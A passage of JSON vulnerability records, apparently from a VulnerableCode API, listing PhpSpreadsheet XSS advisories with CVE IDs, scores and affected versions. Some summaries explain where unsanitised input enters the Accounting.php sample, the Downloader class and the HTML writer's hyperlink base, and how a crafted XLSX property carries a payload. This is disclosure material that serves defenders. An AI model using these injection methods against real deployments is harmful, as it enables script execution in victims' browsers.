HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-rx7m-68vc-ppxh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86243?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86244?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.12"},{"url":"http://public2.vulnerablecode.io/api/packages/86245?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86246?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.0"},{"url":"http://public2.vulnerablecode.io/api/packages/86247?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.0.0"}],"aliases":["CVE-2025-54370","GHSA-rx7m-68vc-ppxh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v6u5-m45s-tbch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56506?format=json","vulnerability_id":"VCID-wbjg-h8tu-vqak","summary":"Cross-Site Scripting (XSS) vulnerability in generateNavigation() function in PhpSpreadsheet\nThe researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability in the code which translates the XLSX file into a HTML representation and displays it in the response.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-22131","reference_id":"","reference_type":"","scores":[{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72531","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72544","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72564","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00706","scoring_system":"epss","scoring_elements":"0.72556","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-22131"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4088381ccfaf241d7d42c333de0dc8c98e338743","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-21T14:58:10Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4088381ccfaf241d7d42c333de0dc8c98e338743"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-22131","reference_id":"CVE-2025-22131","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-22131"},{"reference_url":"https://github.com/advisories/GHSA-79xx-vf93-p7cx","reference_id":"GHSA-79xx-vf93-p7cx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-79xx-vf93-p7cx"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-79xx-vf93-p7cx","reference_id":"GHSA-79xx-vf93-p7cx","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-21T14:58:10Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-79xx-vf93-p7cx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83871?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.8"},{"url":"http://public2.vulnerablecode.io/api/packages/83872?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83873?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83870?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.8.0"}],"aliases":["CVE-2025-22131","GHSA-79xx-vf93-p7cx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wbjg-h8tu-vqak"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56429?format=json","vulnerability_id":"VCID-4dcc-9f7b-7ygb","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in the Accounting.php file\n# Unauthorized Reflected XSS in the `Accounting.php` file\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector v.4.0**: 8.3 (AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L)\n**Description**: using the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` script, an attacker can perform a XSS-type attack\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` file\n**Exploitation conditions**: an unauthorized user\n**Mitigation**: sanitization of the currency variable\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Unauthorized Reflected Cross-Site Scripting (XSS) (in `Accounting.php` file) in Phpspreadsheet.\n\nThere is no sanitization in the `/vendor/phpoffice/phpspreadsheet/samples/Wizards/NumberFormat/Accounting.php` file, which leads to the possibility of a XSS attack.\nStrings are formed using the currency parameter without sanitization, which is controlled by the attacker.\n\n![fig7](https://github.com/user-attachments/assets/da0ee52d-2306-4770-a61d-bce4ba553f4f)\n\n*Figure 7. A fragment of the query in which a string and a parameter are formed without sanitization*\n\nAn attacker can prepare a special HTML form that will be automatically sent to the vulnerable scenario.\n\n*Listing 4. HTML form that demonstrates the exploitation of the XSS vulnerability*","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56366","reference_id":"","reference_type":"","scores":[{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79112","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79114","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79096","published_at":"2026-06-08T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79109","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01179","scoring_system":"epss","scoring_elements":"0.79118","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56366"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:15:43Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/700a80346be269af668914172bc6f4521982d0b4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56366","reference_id":"CVE-2024-56366","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56366"},{"reference_url":"https://github.com/advisories/GHSA-c6fv-7vh8-2rhr","reference_id":"GHSA-c6fv-7vh8-2rhr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c6fv-7vh8-2rhr"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-c6fv-7vh8-2rhr","reference_id":"GHSA-c6fv-7vh8-2rhr","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:L/SI:H/SA:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-01-03T18:15:43Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-c6fv-7vh8-2rhr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56366","GHSA-c6fv-7vh8-2rhr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4dcc-9f7b-7ygb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56424?format=json","vulnerability_id":"VCID-ahdt-gmt1-7bb8","summary":"PhpSpreadsheet has a Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header\n# Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0**: 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description**: the HTML page is formed without sanitizing the hyperlink base\n**Impact**: executing arbitrary JavaScript code in the browser\n**Vulnerable component**: class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateHTMLHeader`\n**Exploitation conditions**: a user viewing a specially generated Excel file\n**Mitigation**: additional sanitization of special characters in a string\n**Researcher**: Aleksey Solovev (Positive Technologies)\n\n# Research\n\nThe researcher discovered zero-day vulnerability Cross-Site Scripting (XSS) vulnerability of the hyperlink base in the HTML page header in Phpspreadsheet.\nThe following code is written on the server, which translates the XLSX file into a HTML representation and displays it in the response.\n\n*Listing 8. Source code on the server*\n\n```\n<?php\n\nrequire __DIR__ . '/vendor/autoload.php';\n\n$inputFileName = './doc/Book1.xlsx';\n$spreadsheet = \\PhpOffice\\PhpSpreadsheet\\IOFactory::load($inputFileName);\n$writer = new \\PhpOffice\\PhpSpreadsheet\\Writer\\Html($spreadsheet);\nprint($writer->generateHTMLAll());\n```\n\nAn attacker can embed a payload in a file property that will result in the execution of arbitrary JavaScript code.\nThe Excel file is unpacked and a HyperlinkBase in the file is inserted into the `docProps/app.xml` file.\n\n![fig14](https://github.com/user-attachments/assets/f68ef7fc-e78e-4424-8753-4318b6ff51c3)\n\n*Figure 14. Embedding the payload* \n\nAfter the changes were made, a new archive with the xlsx extension was created. At the moment of converting the xlsx file into the HTML representation, a property is obtained that participates in the formation of a string without sanitization.\n\n![fig15](https://github.com/user-attachments/assets/0aa7398c-ddd9-4c5a-ab04-41af0236dcba)\n\n*Figure 15. Generating the HTML page header using the HyperlinkBase property* \n\nAfter generating and displaying the HTML representation of the XLSX file, arbitrary JavaScript code will be executed.\n<img width=\"356\" alt=\"fig16\" src=\"https://github.com/user-attachments/assets/c3694661-31e3-4be8-9a86-6eb4dd4647b5\" />\n\n*Figure 16. Executing arbitrary JavaScript code* \n\n# Credit\nThis vulnerability was discovered by **Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56411","reference_id":"","reference_type":"","scores":[{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76143","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76123","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76135","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76142","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00905","scoring_system":"epss","scoring_elements":"0.76148","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-56411"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:36:33Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/45052f88e04c735d56457a8ffcdc40b2635a028e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56411","reference_id":"CVE-2024-56411","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-56411"},{"reference_url":"https://github.com/advisories/GHSA-hwcp-2h35-p66w","reference_id":"GHSA-hwcp-2h35-p66w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hwcp-2h35-p66w"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hwcp-2h35-p66w","reference_id":"GHSA-hwcp-2h35-p66w","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-03T17:36:33Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hwcp-2h35-p66w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83679?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83680?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/83681?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/83678?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.7.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-tebr-cwcv-3bam"},{"vulnerability":"VCID-v6u5-m45s-tbch"},{"vulnerability":"VCID-wbjg-h8tu-vqak"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.7.0"}],"aliases":["CVE-2024-56411","GHSA-hwcp-2h35-p66w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ahdt-gmt1-7bb8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56428?format=json","vulnerability_id":"VCID-bwgw-r1g3-8fhn","summary":"PhpSpreadsheet allows unauthorized Reflected XSS in the constructor of the Downloader class\n# Unauthorized Reflected XSS in the constructor of the `Downloader` class\n\n**Product**: Phpspreadsheet\n**Version**: version 3.6.0\n**CWE-ID**: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1**: 8.2 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n**CVSS vector 